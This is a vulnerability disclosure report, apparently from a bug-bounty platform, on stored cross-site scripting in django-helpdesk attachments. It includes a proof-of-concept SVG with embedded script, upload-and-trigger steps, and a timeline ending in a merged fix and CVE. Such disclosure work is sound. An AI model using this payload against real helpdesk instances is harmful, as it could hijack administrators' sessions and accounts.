Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk

Valid

Reported on

Nov 11th 2021


Description

Stored XSS via upload 'Attachments' with format .svg or .html

Detail

When opening the attachment, some format files will be rendered and loaded on the browser. So it allows executing arbitrary javascript code that was injected into attachment before.

Proof of Concept

// PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

Step top Reproduct

Create a ticket with an unauthenticated user

Upload .svg or .html into attachments

The XSS will trigger when the admin open the attachment

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the django-helpdesk team within 24 hours. 23 days ago
We have contacted a member of the django-helpdesk team and are waiting to hear back 22 days ago
We have contacted a member of the django-helpdesk team and are waiting to hear back 22 days ago
Garret Wassermann validated this vulnerability 22 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
lethanhphuc submitted a
16 days ago
lethanhphuc
16 days ago

Researcher


PR: https://github.com/django-helpdesk/django-helpdesk/pull/984

Garret Wassermann confirmed that a fix has been merged on 04483b 16 days ago
lethanhphuc has been awarded the fix bounty
Jamie Slome
15 days ago

Admin


CVE published! 🎊